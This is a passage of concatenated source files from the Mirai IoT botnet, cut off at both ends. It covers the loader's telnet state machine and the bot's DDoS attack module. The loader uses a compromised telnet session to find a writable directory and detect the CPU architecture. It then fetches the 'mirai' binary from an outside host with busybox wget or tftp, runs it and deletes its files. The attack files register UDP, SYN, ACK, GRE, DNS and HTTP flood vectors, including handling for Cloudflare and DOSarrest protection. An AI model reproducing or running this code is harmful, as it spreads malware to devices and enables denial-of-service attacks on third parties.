if ((consumed = connection_consume_psoutput(conn)) > 0)
{
util_sockprintf(conn->fd, "/bin/busybox cat /proc/mounts; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_PARSE_MOUNTS;
}
break;
case TELNET_PARSE_MOUNTS:
consumed = connection_consume_mounts(conn);
if (consumed)
conn->state_telnet = TELNET_READ_WRITEABLE;
break;
case TELNET_READ_WRITEABLE:
consumed = connection_consume_written_dirs(conn);
if (consumed)
{
#ifdef DEBUG
printf("[FD%d] Found writeable directory: %s/\n", ev->data.fd, conn->info.writedir);
#endif
util_sockprintf(conn->fd, "cd %s/\r\n", conn->info.writedir, conn->info.writedir);
util_sockprintf(conn->fd, "/bin/busybox cp /bin/echo " FN_BINARY "; >" FN_BINARY "; /bin/busybox chmod 777 " FN_BINARY "; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_COPY_ECHO;
conn->timeout = 120;
}
break;
case TELNET_COPY_ECHO:
consumed = connection_consume_copy_op(conn);
if (consumed)
{
#ifdef DEBUG
printf("[FD%d] Finished copying /bin/echo to cwd\n", conn->fd);
#endif
if (!conn->info.has_arch)
{
conn->state_telnet = TELNET_DETECT_ARCH;
conn->timeout = 120;
// DO NOT COMBINE THESE
util_sockprintf(conn->fd, "/bin/busybox cat /bin/echo\r\n");
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
}
else
{
conn->state_telnet = TELNET_UPLOAD_METHODS;
conn->timeout = 15;
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
}
}
break;
case TELNET_DETECT_ARCH:
consumed = connection_consume_arch(conn);
if (consumed)
{
conn->timeout = 15;
if ((conn->bin = binary_get_by_arch(conn->info.arch)) == NULL)
{
#ifdef DEBUG
printf("[FD%d] Cannot determine architecture\n", conn->fd);
#endif
connection_close(conn);
}
else if (strcmp(conn->info.arch, "arm") == 0)
{
#ifdef DEBUG
printf("[FD%d] Determining ARM sub-type\n", conn->fd);
#endif
util_sockprintf(conn->fd, "cat /proc/cpuinfo; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_ARM_SUBTYPE;
}
else
{
#ifdef DEBUG
printf("[FD%d] Detected architecture: '%s'\n", ev->data.fd, conn->info.arch);
#endif
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_UPLOAD_METHODS;
}
}
break;
case TELNET_ARM_SUBTYPE:
if ((consumed = connection_consume_arm_subtype(conn)) > 0)
{
struct binary *bin = binary_get_by_arch(conn->info.arch);
if (bin == NULL)
{
#ifdef DEBUG
printf("[FD%d] We do not have an ARMv7 binary, so we will try using default ARM\n", conn->fd);
#endif
}
else
conn->bin = bin;
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_UPLOAD_METHODS;
}
break;
case TELNET_UPLOAD_METHODS:
consumed = connection_consume_upload_methods(conn);
if (consumed)
{
#ifdef DEBUG
printf("[FD%d] Upload method is ", conn->fd);
#endif
switch (conn->info.upload_method)
{
case UPLOAD_ECHO:
conn->state_telnet = TELNET_UPLOAD_ECHO;
conn->timeout = 30;
util_sockprintf(conn->fd, "/bin/busybox cp "FN_BINARY " " FN_DROPPER "; > " FN_DROPPER "; /bin/busybox chmod 777 " FN_DROPPER "; " TOKEN_QUERY "\r\n");
#ifdef DEBUG
printf("echo\n");
#endif
break;
case UPLOAD_WGET:
conn->state_telnet = TELNET_UPLOAD_WGET;
conn->timeout = 120;
util_sockprintf(conn->fd, "/bin/busybox wget http://%s:%d/bins/%s.%s -O - > "FN_BINARY "; /bin/busybox chmod 777 " FN_BINARY "; " TOKEN_QUERY "\r\n",
wrker->srv->wget_host_ip, wrker->srv->wget_host_port, "mirai", conn->info.arch);
#ifdef DEBUG
printf("wget\n");
#endif
break;
case UPLOAD_TFTP:
conn->state_telnet = TELNET_UPLOAD_TFTP;
conn->timeout = 120;
util_sockprintf(conn->fd, "/bin/busybox tftp -g -l %s -r %s.%s %s; /bin/busybox chmod 777 " FN_BINARY "; " TOKEN_QUERY "\r\n",
FN_BINARY, "mirai", conn->info.arch, wrker->srv->tftp_host_ip);
#ifdef DEBUG
printf("tftp\n");
#endif
break;
}
}
break;
case TELNET_UPLOAD_ECHO:
consumed = connection_upload_echo(conn);
if (consumed)
{
conn->state_telnet = TELNET_RUN_BINARY;
conn->timeout = 30;
#ifdef DEBUG
printf("[FD%d] Finished echo loading!\n", conn->fd);
#endif
util_sockprintf(conn->fd, "./%s; ./%s %s.%s; " EXEC_QUERY "\r\n", FN_DROPPER, FN_BINARY, id_tag, conn->info.arch);
ATOMIC_INC(&wrker->srv->total_echoes);
}
break;
case TELNET_UPLOAD_WGET:
consumed = connection_upload_wget(conn);
if (consumed)
{
conn->state_telnet = TELNET_RUN_BINARY;
conn->timeout = 30;
#ifdef DEBUG
printf("[FD%d] Finished wget loading\n", conn->fd);
#endif
util_sockprintf(conn->fd, "./" FN_BINARY " %s.%s; " EXEC_QUERY "\r\n", id_tag, conn->info.arch);
ATOMIC_INC(&wrker->srv->total_wgets);
}
break;
case TELNET_UPLOAD_TFTP:
consumed = connection_upload_tftp(conn);
if (consumed > 0)
{
conn->state_telnet = TELNET_RUN_BINARY;
conn->timeout = 30;
#ifdef DEBUG
printf("[FD%d] Finished tftp loading\n", conn->fd);
#endif
util_sockprintf(conn->fd, "./" FN_BINARY " %s.%s; " EXEC_QUERY "\r\n", id_tag, conn->info.arch);
ATOMIC_INC(&wrker->srv->total_tftps);
}
else if (consumed < -1) // Did not have permission to TFTP
{
#ifdef DEBUG
printf("[FD%d] No permission to TFTP load, falling back to echo!\n", conn->fd);
#endif
consumed *= -1;
conn->state_telnet = TELNET_UPLOAD_ECHO;
conn->info.upload_method = UPLOAD_ECHO;
conn->timeout = 30;
util_sockprintf(conn->fd, "/bin/busybox cp "FN_BINARY " " FN_DROPPER "; > " FN_DROPPER "; /bin/busybox chmod 777 " FN_DROPPER "; " TOKEN_QUERY "\r\n");
}
break;
case TELNET_RUN_BINARY:
if ((consumed = connection_verify_payload(conn)) > 0)
{
if (consumed >= 255)
{
conn->success = TRUE;
#ifdef DEBUG
printf("[FD%d] Succesfully ran payload\n", conn->fd);
#endif
consumed -= 255;
}
else
{
#ifdef DEBUG
printf("[FD%d] Failed to execute payload\n", conn->fd);
#endif
if (!conn->retry_bin && strncmp(conn->info.arch, "arm", 3) == 0)
{
conn->echo_load_pos = 0;
strcpy(conn->info.arch, (conn->info.arch[3] == '\0' ? "arm7" : "arm"));
conn->bin = binary_get_by_arch(conn->info.arch);
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_UPLOAD_METHODS;
conn->retry_bin = TRUE;
break;
}
}
#ifndef DEBUG
util_sockprintf(conn->fd, "rm -rf " FN_DROPPER "; > " FN_BINARY "; " TOKEN_QUERY "\r\n");
#else
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
#endif
conn->state_telnet = TELNET_CLEANUP;
conn->timeout = 10;
}
break;
case TELNET_CLEANUP:
if ((consumed = connection_consume_cleanup(conn)) > 0)
{
int tfd = conn->fd;
connection_close(conn);
#ifdef DEBUG
printf("[FD%d] Cleaned up files\n", tfd);
#endif
}
default:
consumed = 0;
break;
}
if (consumed == 0) // We didn't consume any data
break;
else
{
if (consumed > conn->rdbuf_pos)
{
consumed = conn->rdbuf_pos;
//printf("consuming more then our position!\n");
//abort();
}
conn->rdbuf_pos -= consumed;
memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
conn->rdbuf[conn->rdbuf_pos] = 0;
}
if (conn->rdbuf_pos > 8196)
{
printf("oversized buffer! 2\n");
abort();
}
}
}
}
}
static void *timeout_thread(void *arg)
{
struct server *srv = (struct server *)arg;
int i, ct;
while (TRUE)
{
ct = time(NULL);
for (i = 0; i < (srv->max_open * 2); i++)
{
struct connection *conn = srv->estab_conns[i];
if (conn->open && conn->last_recv > 0 && ct - conn->last_recv > conn->timeout)
{
#ifdef DEBUG
printf("[FD%d] Timed out\n", conn->fd);
#endif
if (conn->state_telnet == TELNET_RUN_BINARY && !conn->ctrlc_retry && strncmp(conn->info.arch, "arm", 3) == 0)
{
conn->last_recv = time(NULL);
util_sockprintf(conn->fd, "\x03\x1Akill %%1\r\nrm -rf " FN_BINARY " " FN_DROPPER "\r\n");
conn->ctrlc_retry = TRUE;
conn->echo_load_pos = 0;
strcpy(conn->info.arch, (conn->info.arch[3] == '\0' ? "arm7" : "arm"));
conn->bin = binary_get_by_arch(conn->info.arch);
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_UPLOAD_METHODS;
conn->retry_bin = TRUE;
} else {
connection_close(conn);
}
} else if (conn->open && conn->output_buffer.deadline != 0 && time(NULL) > conn->output_buffer.deadline)
{
conn->output_buffer.deadline = 0;
util_sockprintf(conn->fd, conn->output_buffer.data);
}
}
sleep(1);
}
}
================================================
FILE: loader/src/telnet_info.c
================================================
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include "headers/includes.h"
#include "headers/telnet_info.h"
struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info)
{
if (user != NULL)
strcpy(info->user, user);
if (pass != NULL)
strcpy(info->pass, pass);
if (arch != NULL)
strcpy(info->arch, arch);
info->addr = addr;
info->port = port;
info->has_auth = user != NULL || pass != NULL;
info->has_arch = arch != NULL;
return info;
}
struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out) // Format: ip:port user:pass arch
{
char *conn, *auth, *arch;
char *addr_str, *port_str, *user = NULL, *pass = NULL;
ipv4_t addr;
port_t port;
if ((conn = strtok(str, " ")) == NULL)
return NULL;
if ((auth = strtok(NULL, " ")) == NULL)
return NULL;
arch = strtok(NULL, " "); // We don't care if we don't know the arch
if ((addr_str = strtok(conn, ":")) == NULL)
return NULL;
if ((port_str = strtok(NULL, ":")) == NULL)
return NULL;
if (strlen(auth) == 1)
{
if (auth[0] == ':')
{
user = "";
pass = "";
}
else if (auth[0] != '?')
return NULL;
}
else
{
user = strtok(auth, ":");
pass = strtok(NULL, ":");
}
addr = inet_addr(addr_str);
port = htons(atoi(port_str));
return telnet_info_new(user, pass, arch, addr, port, out);
}
================================================
FILE: loader/src/util.c
================================================
#include <stdint.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#include "headers/includes.h"
#include "headers/util.h"
#include "headers/server.h"
void hexDump (char *desc, void *addr, int len) {
int i;
unsigned char buff[17];
unsigned char *pc = (unsigned char*)addr;
// Output description if given.
if (desc != NULL)
printf ("%s:\n", desc);
if (len == 0) {
printf(" ZERO LENGTH\n");
return;
}
if (len < 0) {
printf(" NEGATIVE LENGTH: %i\n",len);
return;
}
// Process every byte in the data.
for (i = 0; i < len; i++) {
// Multiple of 16 means new line (with line offset).
if ((i % 16) == 0) {
// Just don't print ASCII for the zeroth line.
if (i != 0)
printf (" %s\n", buff);
// Output the offset.
printf (" %04x ", i);
}
// Now the hex code for the specific character.
printf (" %02x", pc[i]);
// And store a printable ASCII character for later.
if ((pc[i] < 0x20) || (pc[i] > 0x7e))
buff[i % 16] = '.';
else
buff[i % 16] = pc[i];
buff[(i % 16) + 1] = '\0';
}
// Pad out last line if not exactly 16 characters.
while ((i % 16) != 0) {
printf (" ");
i++;
}
// And print the final ASCII bit.
printf (" %s\n", buff);
}
int util_socket_and_bind(struct server *srv)
{
struct sockaddr_in bind_addr;
int i, fd, start_addr;
BOOL bound = FALSE;
if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
bind_addr.sin_family = AF_INET;
bind_addr.sin_port = 0;
// Try to bind on the first available address
start_addr = rand() % srv->bind_addrs_len;
for (i = 0; i < srv->bind_addrs_len; i++)
{
bind_addr.sin_addr.s_addr = srv->bind_addrs[start_addr];
if (bind(fd, (struct sockaddr *)&bind_addr, sizeof (struct sockaddr_in)) == -1)
{
if (++start_addr == srv->bind_addrs_len)
start_addr = 0;
}
else
{
bound = TRUE;
break;
}
}
if (!bound)
{
close(fd);
#ifdef DEBUG
printf("Failed to bind on any address\n");
#endif
return -1;
}
// Set the socket in nonblocking mode
if (fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK) == -1)
{
#ifdef DEBUG
printf("Failed to set socket in nonblocking mode. This will have SERIOUS performance implications\n");
#endif
}
return fd;
}
int util_memsearch(char *buf, int buf_len, char *mem, int mem_len)
{
int i, matched = 0;
if (mem_len > buf_len)
return -1;
for (i = 0; i < buf_len; i++)
{
if (buf[i] == mem[matched])
{
if (++matched == mem_len)
return i + 1;
}
else
matched = 0;
}
return -1;
}
BOOL util_sockprintf(int fd, const char *fmt, ...)
{
char buffer[BUFFER_SIZE + 2];
va_list args;
int len;
va_start(args, fmt);
len = vsnprintf(buffer, BUFFER_SIZE, fmt, args);
va_end(args);
if (len > 0)
{
if (len > BUFFER_SIZE)
len = BUFFER_SIZE;
#ifdef DEBUG
hexDump("TELOUT", buffer, len);
#endif
if (send(fd, buffer, len, MSG_NOSIGNAL) != len)
return FALSE;
}
return TRUE;
}
char *util_trim(char *str)
{
char *end;
while(isspace(*str))
str++;
if(*str == 0)
return str;
end = str + strlen(str) - 1;
while(end > str && isspace(*end))
end--;
*(end+1) = 0;
return str;
}
================================================
FILE: mirai/bot/attack.c
================================================
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include "includes.h"
#include "attack.h"
#include "rand.h"
#include "util.h"
#include "scanner.h"
uint8_t methods_len = 0;
struct attack_method **methods = NULL;
int attack_ongoing[ATTACK_CONCURRENT_MAX] = {0};
BOOL attack_init(void)
{
int i;
add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);
add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);
add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);
add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);
add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);
add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);
add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);
add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip);
add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth);
//add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);
add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);
return TRUE;
}
void attack_kill_all(void)
{
int i;
#ifdef DEBUG
printf("[attack] Killing all ongoing attacks\n");
#endif
for (i = 0; i < ATTACK_CONCURRENT_MAX; i++)
{
if (attack_ongoing[i] != 0)
kill(attack_ongoing[i], 9);
attack_ongoing[i] = 0;
}
#ifdef MIRAI_TELNET
scanner_init();
#endif
}
void attack_parse(char *buf, int len)
{
int i;
uint32_t duration;
ATTACK_VECTOR vector;
uint8_t targs_len, opts_len;
struct attack_target *targs = NULL;
struct attack_option *opts = NULL;
// Read in attack duration uint32_t
if (len < sizeof (uint32_t))
goto cleanup;
duration = ntohl(*((uint32_t *)buf));
buf += sizeof (uint32_t);
len -= sizeof (uint32_t);
// Read in attack ID uint8_t
if (len == 0)
goto cleanup;
vector = (ATTACK_VECTOR)*buf++;
len -= sizeof (uint8_t);
// Read in target count uint8_t
if (len == 0)
goto cleanup;
targs_len = (uint8_t)*buf++;
len -= sizeof (uint8_t);
if (targs_len == 0)
goto cleanup;
// Read in all targs
if (len < ((sizeof (ipv4_t) + sizeof (uint8_t)) * targs_len))
goto cleanup;
targs = calloc(targs_len, sizeof (struct attack_target));
for (i = 0; i < targs_len; i++)
{
targs[i].addr = *((ipv4_t *)buf);
buf += sizeof (ipv4_t);
targs[i].netmask = (uint8_t)*buf++;
len -= (sizeof (ipv4_t) + sizeof (uint8_t));
targs[i].sock_addr.sin_family = AF_INET;
targs[i].sock_addr.sin_addr.s_addr = targs[i].addr;
}
// Read in flag count uint8_t
if (len < sizeof (uint8_t))
goto cleanup;
opts_len = (uint8_t)*buf++;
len -= sizeof (uint8_t);
// Read in all opts
if (opts_len > 0)
{
opts = calloc(opts_len, sizeof (struct attack_option));
for (i = 0; i < opts_len; i++)
{
uint8_t val_len;
// Read in key uint8
if (len < sizeof (uint8_t))
goto cleanup;
opts[i].key = (uint8_t)*buf++;
len -= sizeof (uint8_t);
// Read in data length uint8
if (len < sizeof (uint8_t))
goto cleanup;
val_len = (uint8_t)*buf++;
len -= sizeof (uint8_t);
if (len < val_len)
goto cleanup;
opts[i].val = calloc(val_len + 1, sizeof (char));
util_memcpy(opts[i].val, buf, val_len);
buf += val_len;
len -= val_len;
}
}
errno = 0;
attack_start(duration, vector, targs_len, targs, opts_len, opts);
// Cleanup
cleanup:
if (targs != NULL)
free(targs);
if (opts != NULL)
free_opts(opts, opts_len);
}
void attack_start(int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int pid1, pid2;
pid1 = fork();
if (pid1 == -1 || pid1 > 0)
return;
pid2 = fork();
if (pid2 == -1)
exit(0);
else if (pid2 == 0)
{
sleep(duration);
kill(getppid(), 9);
exit(0);
}
else
{
int i;
for (i = 0; i < methods_len; i++)
{
if (methods[i]->vector == vector)
{
#ifdef DEBUG
printf("[attack] Starting attack...\n");
#endif
methods[i]->func(targs_len, targs, opts_len, opts);
break;
}
}
//just bail if the function returns
exit(0);
}
}
char *attack_get_opt_str(uint8_t opts_len, struct attack_option *opts, uint8_t opt, char *def)
{
int i;
for (i = 0; i < opts_len; i++)
{
if (opts[i].key == opt)
return opts[i].val;
}
return def;
}
int attack_get_opt_int(uint8_t opts_len, struct attack_option *opts, uint8_t opt, int def)
{
char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
if (val == NULL)
return def;
else
return util_atoi(val, 10);
}
uint32_t attack_get_opt_ip(uint8_t opts_len, struct attack_option *opts, uint8_t opt, uint32_t def)
{
char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
if (val == NULL)
return def;
else
return inet_addr(val);
}
static void add_attack(ATTACK_VECTOR vector, ATTACK_FUNC func)
{
struct attack_method *method = calloc(1, sizeof (struct attack_method));
method->vector = vector;
method->func = func;
methods = realloc(methods, (methods_len + 1) * sizeof (struct attack_method *));
methods[methods_len++] = method;
}
static void free_opts(struct attack_option *opts, int len)
{
int i;
if (opts == NULL)
return;
for (i = 0; i < len; i++)
{
if (opts[i].val != NULL)
free(opts[i].val);
}
free(opts);
}
================================================
FILE: mirai/bot/attack.h
================================================
#pragma once
#include <time.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <linux/tcp.h>
#include "includes.h"
#include "protocol.h"
#define ATTACK_CONCURRENT_MAX 8
#ifdef DEBUG
#define HTTP_CONNECTION_MAX 1000
#else
#define HTTP_CONNECTION_MAX 256
#endif
struct attack_target {
struct sockaddr_in sock_addr;
ipv4_t addr;
uint8_t netmask;
};
struct attack_option {
char *val;
uint8_t key;
};
typedef void (*ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t, struct attack_option *);
typedef uint8_t ATTACK_VECTOR;
#define ATK_VEC_UDP 0 /* Straight up UDP flood */
#define ATK_VEC_VSE 1 /* Valve Source Engine query flood */
#define ATK_VEC_DNS 2 /* DNS water torture */
#define ATK_VEC_SYN 3 /* SYN flood with options */
#define ATK_VEC_ACK 4 /* ACK flood */
#define ATK_VEC_STOMP 5 /* ACK flood to bypass mitigation devices */
#define ATK_VEC_GREIP 6 /* GRE IP flood */
#define ATK_VEC_GREETH 7 /* GRE Ethernet flood */
//#define ATK_VEC_PROXY 8 /* Proxy knockback connection */
#define ATK_VEC_UDP_PLAIN 9 /* Plain UDP flood optimized for speed */
#define ATK_VEC_HTTP 10 /* HTTP layer 7 flood */
#define ATK_OPT_PAYLOAD_SIZE 0 // What should the size of the packet data be?
#define ATK_OPT_PAYLOAD_RAND 1 // Should we randomize the packet data contents?
#define ATK_OPT_IP_TOS 2 // tos field in IP header
#define ATK_OPT_IP_IDENT 3 // ident field in IP header
#define ATK_OPT_IP_TTL 4 // ttl field in IP header
#define ATK_OPT_IP_DF 5 // Dont-Fragment bit set
#define ATK_OPT_SPORT 6 // Should we force a source port? (0 = random)
#define ATK_OPT_DPORT 7 // Should we force a dest port? (0 = random)
#define ATK_OPT_DOMAIN 8 // Domain name for DNS attack
#define ATK_OPT_DNS_HDR_ID 9 // Domain name header ID
//#define ATK_OPT_TCPCC 10 // TCP congestion control
#define ATK_OPT_URG 11 // TCP URG header flag
#define ATK_OPT_ACK 12 // TCP ACK header flag
#define ATK_OPT_PSH 13 // TCP PSH header flag
#define ATK_OPT_RST 14 // TCP RST header flag
#define ATK_OPT_SYN 15 // TCP SYN header flag
#define ATK_OPT_FIN 16 // TCP FIN header flag
#define ATK_OPT_SEQRND 17 // Should we force the sequence number? (TCP only)
#define ATK_OPT_ACKRND 18 // Should we force the ack number? (TCP only)
#define ATK_OPT_GRE_CONSTIP 19 // Should the encapsulated destination address be the same as the target?
#define ATK_OPT_METHOD 20 // Method for HTTP flood
#define ATK_OPT_POST_DATA 21 // Any data to be posted with HTTP flood
#define ATK_OPT_PATH 22 // The path for the HTTP flood
#define ATK_OPT_HTTPS 23 // Is this URL SSL/HTTPS?
#define ATK_OPT_CONNS 24 // Number of sockets to use
#define ATK_OPT_SOURCE 25 // Source IP
struct attack_method {
ATTACK_FUNC func;
ATTACK_VECTOR vector;
};
struct attack_stomp_data {
ipv4_t addr;
uint32_t seq, ack_seq;
port_t sport, dport;
};
#define HTTP_CONN_INIT 0 // Inital state
#define HTTP_CONN_RESTART 1 // Scheduled to restart connection next spin
#define HTTP_CONN_CONNECTING 2 // Waiting for it to connect
#define HTTP_CONN_HTTPS_STUFF 3 // Handle any needed HTTPS stuff such as negotiation
#define HTTP_CONN_SEND 4 // Sending HTTP request
#define HTTP_CONN_SEND_HEADERS 5 // Send HTTP headers
#define HTTP_CONN_RECV_HEADER 6 // Get HTTP headers and check for things like location or cookies etc
#define HTTP_CONN_RECV_BODY 7 // Get HTTP body and check for cf iaua mode
#define HTTP_CONN_SEND_JUNK 8 // Send as much data as possible
#define HTTP_CONN_SNDBUF_WAIT 9 // Wait for socket to be available to be written to
#define HTTP_CONN_QUEUE_RESTART 10 // restart the connection/send new request BUT FIRST read any other available data.
#define HTTP_CONN_CLOSED 11 // Close connection and move on
#define HTTP_RDBUF_SIZE 1024
#define HTTP_HACK_DRAIN 64
#define HTTP_PATH_MAX 256
#define HTTP_DOMAIN_MAX 128
#define HTTP_COOKIE_MAX 5 // no more then 5 tracked cookies
#define HTTP_COOKIE_LEN_MAX 128 // max cookie len
#define HTTP_POST_MAX 512 // max post data len
#define HTTP_PROT_DOSARREST 1 // Server: DOSarrest
#define HTTP_PROT_CLOUDFLARE 2 // Server: cloudflare-nginx
struct attack_http_state {
int fd;
uint8_t state;
int last_recv;
int last_send;
ipv4_t dst_addr;
char user_agent[512];
char path[HTTP_PATH_MAX + 1];
char domain[HTTP_DOMAIN_MAX + 1];
char postdata[HTTP_POST_MAX + 1];
char method[9];
char orig_method[9];
int protection_type;
int keepalive;
int chunked;
int content_length;
int num_cookies;
char cookies[HTTP_COOKIE_MAX][HTTP_COOKIE_LEN_MAX];
int rdbuf_pos;
char rdbuf[HTTP_RDBUF_SIZE];
};
struct attack_cfnull_state {
int fd;
uint8_t state;
int last_recv;
int last_send;
ipv4_t dst_addr;
char user_agent[512];
char domain[HTTP_DOMAIN_MAX + 1];
int to_send;
};
BOOL attack_init(void);
void attack_kill_all(void);
void attack_parse(char *, int);
void attack_start(int, ATTACK_VECTOR, uint8_t, struct attack_target *, uint8_t, struct attack_option *);
char *attack_get_opt_str(uint8_t, struct attack_option *, uint8_t, char *);
int attack_get_opt_int(uint8_t, struct attack_option *, uint8_t, int);
uint32_t attack_get_opt_ip(uint8_t, struct attack_option *, uint8_t, uint32_t);
/* Actual attacks */
void attack_udp_generic(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_udp_vse(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_udp_dns(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_udp_plain(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_tcp_syn(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_tcp_ack(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_tcp_stomp(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_gre_ip(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_gre_eth(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_app_proxy(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
void attack_app_http(uint8_t, struct attack_target *, uint8_t, struct attack_option *);
static void add_attack(ATTACK_VECTOR, ATTACK_FUNC);
static void free_opts(struct attack_option *, int);
================================================
FILE: mirai/bot/attack_app.c
================================================
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include "includes.h"
#include "attack.h"
#include "rand.h"
#include "table.h"
#include "util.h"
void attack_app_proxy(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
}
void attack_app_http(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int i, ii, rfd, ret = 0;
struct attack_http_state *http_table = NULL;
char *postdata = attack_get_opt_str(opts_len, opts, ATK_OPT_POST_DATA, NULL);
char *method = attack_get_opt_str(opts_len, opts, ATK_OPT_METHOD, "GET");
char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
char *path = attack_get_opt_str(opts_len, opts, ATK_OPT_PATH, "/");
int sockets = attack_get_opt_int(opts_len, opts, ATK_OPT_CONNS, 1);
port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 80);
char generic_memes[10241] = {0};
if (domain == NULL || path == NULL)
return;
if (util_strlen(path) > HTTP_PATH_MAX - 1)
return;
if (util_strlen(domain) > HTTP_DOMAIN_MAX - 1)
return;
if (util_strlen(method) > 9)
return;
// BUT BRAH WHAT IF METHOD IS THE DEFAULT VALUE WONT IT SEGFAULT CAUSE READ ONLY STRING?
// yes it would segfault but we only update the values if they are not already uppercase.
// if the method is lowercase and its passed from the CNC we can update that memory no problem
for (ii = 0; ii < util_strlen(method); ii++)
if (method[ii] >= 'a' && method[ii] <= 'z')
method[ii] -= 32;
if (sockets > HTTP_CONNECTION_MAX)
sockets = HTTP_CONNECTION_MAX;
// unlock frequently used strings
table_unlock_val(TABLE_ATK_SET_COOKIE);
table_unlock_val(TABLE_ATK_REFRESH_HDR);
table_unlock_val(TABLE_ATK_LOCATION_HDR);
table_unlock_val(TABLE_ATK_SET_COOKIE_HDR);
table_unlock_val(TABLE_ATK_CONTENT_LENGTH_HDR);
table_unlock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
table_unlock_val(TABLE_ATK_CHUNKED);
table_unlock_val(TABLE_ATK_KEEP_ALIVE_HDR);
table_unlock_val(TABLE_ATK_CONNECTION_HDR);
table_unlock_val(TABLE_ATK_DOSARREST);
table_unlock_val(TABLE_ATK_CLOUDFLARE_NGINX);
http_table = calloc(sockets, sizeof(struct attack_http_state));
for (i = 0; i < sockets; i++)
{
http_table[i].state = HTTP_CONN_INIT;
http_table[i].fd = -1;
http_table[i].dst_addr = targs[i % targs_len].addr;
util_strcpy(http_table[i].path, path);
if (http_table[i].path[0] != '/')
{
memmove(http_table[i].path + 1, http_table[i].path, util_strlen(http_table[i].path));
http_table[i].path[0] = '/';
}
util_strcpy(http_table[i].orig_method, method);
util_strcpy(http_table[i].method, method);
util_strcpy(http_table[i].domain, domain);
if (targs[i % targs_len].netmask < 32)
http_table[i].dst_addr = htonl(ntohl(targs[i % targs_len].addr) + (((uint32_t)rand_next()) >> targs[i % targs_len].netmask));
switch(rand_next() % 5)
{
case 0:
table_unlock_val(TABLE_HTTP_ONE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_ONE, NULL));
table_lock_val(TABLE_HTTP_ONE);
break;
case 1:
table_unlock_val(TABLE_HTTP_TWO);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_TWO, NULL));
table_lock_val(TABLE_HTTP_TWO);
break;
case 2:
table_unlock_val(TABLE_HTTP_THREE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_THREE, NULL));
table_lock_val(TABLE_HTTP_THREE);
break;
case 3:
table_unlock_val(TABLE_HTTP_FOUR);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FOUR, NULL));
table_lock_val(TABLE_HTTP_FOUR);
break;
case 4:
table_unlock_val(TABLE_HTTP_FIVE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FIVE, NULL));
table_lock_val(TABLE_HTTP_FIVE);
break;
}
util_strcpy(http_table[i].path, path);
}
while(TRUE)
{
fd_set fdset_rd, fdset_wr;
int mfd = 0, nfds;
struct timeval tim;
